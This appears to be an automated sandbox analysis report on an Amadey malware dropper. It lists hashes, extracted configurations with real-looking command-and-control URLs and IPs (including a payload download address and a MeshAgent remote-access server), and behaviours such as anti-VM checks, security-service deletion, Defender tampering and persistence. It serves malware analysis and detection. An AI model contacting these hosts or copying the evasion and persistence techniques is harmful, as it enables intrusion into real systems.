amadey | 37a9c1cd8cb5dad16158797afcc474f5a2926ced95915e9b2cbe5822b88f0f5d

Analysis

max time kernel
146s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
04/04/2025, 20:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size

938KB
MD5

e6622b997703fc5a207a053a7f3b4c3b
SHA1

3c6d3306c0d76b6b714f4c2a72b704c8b07ae84c
SHA256

37a9c1cd8cb5dad16158797afcc474f5a2926ced95915e9b2cbe5822b88f0f5d
SHA512

acf8d1c72adef86e2e6b46887dea44338d7c5e80f7cc220b6a54d816948f63a47d85486606ccba37fff541951b426f7c5bf37e4b47105099ce88241b1de65227
SSDEEP

24576:dqDEvCTbMWu7rQYlBQcBiT6rprG8a0Au:dTvC/MTQYxsWR7a0A

Score

10^/10

amadey gcleaner meshagent 092155 test123 backdoor defense_evasion discovery execution exploit loader persistence rat trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

meshagent

Version

Botnet

test123

http://aaso12.duckdns.org:443/agent.ashx

Attributes

mesh_id
0x0CF4A8B0663DD2F1D3A44CE8D231621166DBDB1E723B374C911544DE2F45A87C6C52F7206CED32F5B6A52A5551B75A3C
server_id
22F126392DFCD804B6AF755F256A707D53ED8D200650E6BC853C95860F21B6B7049AF4EBEAB393E6EE1A9315B396BFC8
wss
wss://aaso12.duckdns.org:443/agent.ashx

Extracted

Family

gcleaner

185.156.73.98

45.91.200.135

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey

Detects MeshAgent payload 3 IoCs

resource	yara_rule
behavioral1/memory/5020-107-0x00007FF7BB4E0000-0x00007FF7BB855000-memory.dmp	family_meshagent
behavioral1/files/0x000700000001e6c5-110.dat	family_meshagent
behavioral1/memory/5020-114-0x00007FF7BB4E0000-0x00007FF7BB855000-memory.dmp	family_meshagent

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
MeshAgent
MeshAgent is an open source remote access trojan written in C++.
rat trojan backdoor meshagent
Meshagent family
meshagent

Modifies security service 2 TTPs 2 IoCs

defense_evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security	reg.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	eb1cfbb5e5.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
18	4348	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4348	powershell.exe
2576	powershell.exe
5096	powershell.exe
536	powershell.exe
1180	powershell.exe
3784	powershell.exe
3184	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 6 IoCs

flow	pid	Process
67	1204	rapes.exe
67	1204	rapes.exe
67	1204	rapes.exe
83	4508	svchost015.exe
18	4348	powershell.exe
84	1204	rapes.exe

Possible privilege escalation attempt 2 IoCs

exploit

pid	Process
4448	takeown.exe
1392	icacls.exe

Sets service image path in registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Mesh Agent\ImagePath = "\"C:\\Program Files\\Mesh Agent\\MeshAgent.exe\" "	s.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	eb1cfbb5e5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	eb1cfbb5e5.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	rapes.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	apple.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	262.exe
Key value queried	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation	262.exe

Executes dropped EXE 13 IoCs

pid	Process
2968	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
1204	rapes.exe
2068	apple.exe
512	262.exe
4140	262.exe
3192	MeshAgent.exe
1100	rapes.exe
1244	1687be4552.exe
4508	svchost015.exe
1384	rapes.exe
4500	eb1cfbb5e5.exe
2536	svchost015.exe
1392	7q8Wm5h.exe

Identifies Wine through registry keys 2 TTPs 5 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	eb1cfbb5e5.exe
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
Key opened	\REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine	rapes.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1392	icacls.exe
4448	takeown.exe

Drops file in System32 directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\bcryptprimitives.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdi32full.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shell32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\comctl32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\apphelp.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ncrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\dbgcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntasn1.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\crypt32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\advapi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\DLL\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\Kernel.Appcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\exe\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\user32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\iphlpapi.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\gdiplus.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\bcrypt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\msvcp_win.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntasn1.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\9A54F2D6BE769842EB342B20544ED7B1A62BD827	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\EB2FAAB0D1289E893A35D07C4DF08211C7F4543A	MeshAgent.exe
File opened for modification	C:\Windows\System32\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\kernelbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\rpcrt4.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ucrtbase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\shcore.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\sechost.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ole32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\symbols\dll\ncrypt.pdb	MeshAgent.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\System32\MeshService64.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\ntdll.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\DLL\kernel32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\win32u.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\gdi32.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\msvcrt.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\combase.pdb	MeshAgent.exe
File opened for modification	C:\Windows\System32\dll\apphelp.pdb	MeshAgent.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs

pid	Process
2968	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
1204	rapes.exe
1100	rapes.exe
1384	rapes.exe
4500	eb1cfbb5e5.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1244 set thread context of 4508	1244	1687be4552.exe	206
PID 4500 set thread context of 2536	4500	eb1cfbb5e5.exe	210

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows Defender\de-DE\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db.tmp	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\EppManifest.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Mesh Agent\MeshAgent.db	MeshAgent.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe
File created	C:\Program Files\Mesh Agent\MeshAgent.exe	s.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement.mfl	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\shellext.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\ProtectionManagement_Uninstall.mfl	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\es-ES\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\uk-UA\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\OfflineScannerShell.exe.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\it-IT\ProtectionManagement.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui	cmd.exe
File opened for modification	C:\Program Files (x86)\Windows Defender\uk-UA\EppManifest.dll.mui	cmd.exe
File opened for modification	C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE

Launches sc.exe 38 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4496	sc.exe
4656	sc.exe
1876	sc.exe
3548	sc.exe
4492	sc.exe
4856	sc.exe
4532	sc.exe
3596	sc.exe
1156	sc.exe
1668	sc.exe
1172	sc.exe
4660	sc.exe
3760	sc.exe
2916	sc.exe
3520	sc.exe
1168	sc.exe
944	sc.exe
2948	sc.exe
3752	sc.exe
3596	sc.exe
1380	sc.exe
3668	sc.exe
968	sc.exe
4908	sc.exe
860	sc.exe
2680	sc.exe
2536	sc.exe
4176	sc.exe
2236	sc.exe
5116	sc.exe
5024	sc.exe
4508	sc.exe
3348	sc.exe
1380	sc.exe
4980	sc.exe
4864	sc.exe
3192	sc.exe
1068	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 18 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eb1cfbb5e5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1687be4552.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-04-04_e6622b997703fc5a207a053a7f3b4c3b_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempBU5IF2KWUWF7L8UU62VWPQ921HXKBOHW.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	262.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
3184	timeout.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	MeshAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	MeshAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
